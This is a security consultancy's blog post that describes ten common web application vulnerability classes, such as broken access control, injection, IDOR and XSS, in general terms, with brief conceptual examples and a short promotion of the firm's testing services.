A major component of the security review of an application is checking for the OWASP top 10 vulnerabilities. cyberSecurist goes beyond this official list to review applications. This blog will dive into the top 10 vulnerabilities that are exploited by hackers to cause harm and the list represents the top vulnerablities discovered by cyberSecurist as a part of the application pen tests completed during 2022. The list also includes the CWE top 25 vulnerablities.
1. Broken access control
Broken access control happens when restrictions on what users are allowed to do are not properly enforced.
Access control determines whether the user is allowed to carry out the action that they are attempting to perform. Design and management of access controls is a complex and dynamic problem that applies business, organizational, and legal constraints to technical implementation. Access control design decisions have to be made by humans, not technology, and the potential for errors is high.
Access controls can be of the following types:
- Vertical Access Controls:Different types of users have access to different application functions. For example, an administrator might be able to modify or delete any user's account, while an ordinary user has no access to these actions.
- Horizontal Access Controls: Different users have access to a subset of resources of the same type. For example, a banking application will allow a user to view transactions and make payments from their own accounts, but not the accounts of any other user.
2. Broken authentication
Authentication breaks when functions related to authentication and session management are written or implemented incorrectly, which allows attackers to compromise passwords, keywords, and sessions, which can lead to stolen user identity and much more data.broken authentication refers to weaknesses in two areas: session management and credential management.
For example, a web application allows the use of weak or easy-to-guess passwords (i.e., “Admin@123”).
3. Sensitive data exposure
When a web application does not protect sensitive information from being disclosed to attackers. This can include information such as credit card data, session tokens, secret keys, medical history, Personal Idenfiable Information (PII), or other authentication credentials.
Injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database, and generally allows an attacker to view data that they are not normally able to retrieve. An injection attack can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information.
Examples include SQL injection, XPath injection, OS Command injection.
5. Security misconfiguration
Security misconfigurations are security controls that are erroneously arranged or left uncertain, putting your system and data at risk. Automated scanners are useful for detecting misconfigurations, such as, use of default accounts or configurations, unnecessary services, legacy options, etc.
For example, a default account and its original password are still enabled, making the system vulnerable to exploitation.
6. Insecure Direct Object References (IDOR)
An IDOR occurs when a user supplied input is unvalidated and direct access to the object requested is provided. When an application uses user-supplied input to access objects directly. IDOR vulnerabilities are most commonly associated with horizontal privilege escalation, but they can also arise in relation to vertical privilege escalation.
For example, User "A" will have ID100 and user "B" will have ID201. IDOR vulnerability targets a flaw in the way the application references these objects. This gives direct access to unauthorized resources.
7. Business logic vulnerabilities
It is the flaw in design and implementation of an application that allows an attacker to evoke unintended behaviour. This potentially enables attackers to manipulate legitimate functionality to achieve a malicious goal.
For example, a critical parameter manipulation or logical data validation, or failing to handle unconventional input.
cyberSecurist Technologies provides comprehensive and cost-effective information and application security (infosec and appsec) assessment / assurance services to help you discover these vulnerabilities and adopt security best practices to prevent system compromise.
8. Enumeration issues
Enumeration is defined as the process of extracting user names, machine names, network resources, shares and services from a system. Enumeration issues occur when a malicious actor can use brute-force techniques to either guess or confirm valid users in a system.
For example, an error message that shows "user does not exist" or "the password is incorrect".
9. Cross-site scripting (XSS)
XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.
- Reflected XSS - Where the malicious script comes from the current HTTP request.
- Stored XSS - Where the malicious script comes from the website's database.
- DOM-based XSS where the vulnerability exists in client-side code rather than server-side code.
10. Rate control
Rate limiting is based on tracking the IP addresses that requests are coming from, and tracking how much time elapses between each request. The IP address is the main way an application identifies who or what is making the request.If a bot can only make 3 or 4 login attempts an hour, then such an attack is statistically unlikely to be successful.
For example, DDoS attacks, brute force attacks.